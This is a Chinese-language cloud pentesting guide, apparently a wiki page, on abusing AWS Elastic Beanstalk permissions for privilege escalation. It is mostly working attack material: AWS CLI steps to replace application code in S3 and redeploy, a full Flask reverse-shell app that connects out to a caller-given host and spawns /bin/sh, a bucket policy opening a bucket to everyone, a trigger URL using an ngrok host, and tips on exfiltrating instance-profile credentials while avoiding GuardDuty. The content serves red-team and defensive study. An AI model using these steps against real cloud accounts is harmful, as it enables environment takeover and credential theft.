Elastic Beanstalk
更多关于 Elastic Beanstalk 的信息在:
AWS - Elastic Beanstalk Enum 为了在 Beanstalk 中执行敏感操作,您需要在许多不同的服务中拥有 大量敏感权限 。您可以检查例如授予 arn:aws:iam::aws:policy/AdministratorAccess-AWSElasticBeanstalk
elasticbeanstalk:RebuildEnvironment、S3 写权限及其他
拥有 对包含环境代码的 S3 存储桶的写权限 和 重建 应用程序的权限(需要 elasticbeanstalk:RebuildEnvironment 以及与 S3、EC2 和 Cloudformation 相关的其他权限),您可以 修改 代码 、重建 应用程序,下次访问应用程序时,它将 执行您的新代码 ,允许攻击者妥协应用程序及其 IAM 角色凭证。
Copy # Create folder
mkdir elasticbeanstalk-eu-west-1-947247140022
cd elasticbeanstalk-eu-west-1-947247140022
# Download code
aws s3 sync s3://elasticbeanstalk-eu-west-1-947247140022 .
# Change code
unzip 1692777270420-aws-flask-app.zip
zip 1692777270420-aws-flask-app.zip < files to zi p >
# Upload code
aws s3 cp 1692777270420-aws-flask-app.zip s3://elasticbeanstalk-eu-west-1-947247140022/1692777270420-aws-flask-app.zip
# Rebuild env
aws elasticbeanstalk rebuild-environment --environment-name "env-name" elasticbeanstalk:CreateApplication, elasticbeanstalk:CreateEnvironment, elasticbeanstalk:CreateApplicationVersion, elasticbeanstalk:UpdateEnvironment, iam:PassRole,以及更多...
提到的权限加上几个 S3 EC2 cloudformation autoscaling elasticloadbalancing
创建一个 AWS Elastic Beanstalk 应用程序:
Copy aws elasticbeanstalk create-application --application-name MyApp 创建一个 AWS Elastic Beanstalk 环境 (支持的平台
Copy aws elasticbeanstalk create-environment --application-name MyApp --environment-name MyEnv --solution-stack-name "64bit Amazon Linux 2 v3.4.2 running Python 3.8" --option-settings Namespace=aws:autoscaling:launchconfiguration,OptionName=IamInstanceProfile,Value=aws-elasticbeanstalk-ec2-role 如果环境已经创建,并且你不想创建一个新的环境 ,你可以更新 现有的环境。
Copy aws s3 cp MyApp . zip s3 : // elasticbeanstalk -< region >-< accId >/ MyApp . zip 创建一个 AWS Elastic Beanstalk 应用程序版本:
Copy aws elasticbeanstalk create-application-version --application-name MyApp --version-label MyApp-1 .0 --source-bundle S3Bucket=" elasticbeanstalk- <region > -<accId > " , S3Key="MyApp.zip" 将应用程序版本部署到您的 AWS Elastic Beanstalk 环境:
Copy aws elasticbeanstalk update-environment --environment-name MyEnv --version-label MyApp-1.0 elasticbeanstalk:CreateApplicationVersion, elasticbeanstalk:UpdateEnvironment, cloudformation:GetTemplate, cloudformation:DescribeStackResources, cloudformation:DescribeStackResource, autoscaling:DescribeAutoScalingGroups, autoscaling:SuspendProcesses, autoscaling:SuspendProcesses
首先,您需要创建一个合法的 Beanstalk 环境 ,其中包含您希望在受害者 上运行的代码 ,按照之前的步骤 进行操作。可能是一个简单的zip 文件,包含这2个文件 :
application.py requirements.txt
Copy from flask import Flask , request , jsonify
import subprocess , os , socket
application = Flask ( __name__ )
@application . errorhandler ( 404 )
def page_not_found ( e ):
return jsonify ( '404' )
@application . route ( "/" )
def index ():
return jsonify ( 'Welcome!' )
@application . route ( "/get_shell" )
def search ():
host = request . args . get ( 'host' )
port = request . args . get ( 'port' )
if host and port :
s = socket . socket (socket.AF_INET,socket.SOCK_STREAM)
s . connect ((host, int (port)))
os . dup2 (s. fileno (), 0 )
os . dup2 (s. fileno (), 1 )
os . dup2 (s. fileno (), 2 )
p = subprocess . call ([ "/bin/sh" , "-i" ])
return jsonify ( 'done' )
if __name__ == "__main__" :
application . run ()
Copy click==7.1.2
Flask==1.1.2
itsdangerous==1.1.0
Jinja2==2.11.3
MarkupSafe==1.1.1
Werkzeug==1.0.1 一旦你有了 自己的 Beanstalk 环境运行 你的 rev shell,就该 迁移 到 受害者 环境了。为此,你需要 更新 你的 beanstalk S3 存储桶的 Bucket Policy ,以便 受害者可以访问它 (请注意,这将 开放 存储桶给 所有人 ):
Copy {
"Version" : "2008-10-17" ,
"Statement" : [
{
"Sid" : "eb-af163bf3-d27b-4712-b795-d1e33e331ca4" ,
"Effect" : "Allow" ,
"Principal" : {
"AWS" : "*"
} ,
"Action" : [
"s3:ListBucket" ,
"s3:ListBucketVersions" ,
"s3:GetObject" ,
"s3:GetObjectVersion" ,
"s3:*"
] ,
"Resource" : [
"arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022" ,
"arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022/*"
]
} ,
{
"Sid" : "eb-58950a8c-feb6-11e2-89e0-0800277d041b" ,
"Effect" : "Deny" ,
"Principal" : {
"AWS" : "*"
} ,
"Action" : "s3:DeleteBucket" ,
"Resource" : "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022"
}
]
}
Copy # Use a new --version-label
# Use the bucket from your own account
aws elasticbeanstalk create-application-version --application-name MyApp --version-label MyApp-2.0 --source-bundle S3Bucket= "elasticbeanstalk-<region>-<accId>" ,S3Key= "revshell.zip"
# These step needs the extra permissions
aws elasticbeanstalk update-environment --environment-name MyEnv --version-label MyApp-1.0
# To get your rev shell just access the exposed web URL with params such as:
http://myenv.eba-ankaia7k.us-east-1.elasticbeanstalk.com/get_shell?host =0.tcp.eu.ngrok.io & port = 13528
Alternatively, [MaliciousBeanstalk](https://github.com/fr4nk3nst1ner/MaliciousBeanstalk) can be used to deploy a Beanstalk application that takes advantage of overly permissive Instance Profiles. Deploying this application will execute a binary (e.g., [Mythic](https://github.com/its-a-feature/Mythic) payload) and/or exfiltrate the instance profile security credentials (use with caution, GuardDuty alerts when instance profile credentials are used outside the ec2 instance).
The developer has intentions to establish a reverse shell using Netcat or Socat with next steps to keep exploitation contained to the ec2 instance to avoid detections. 
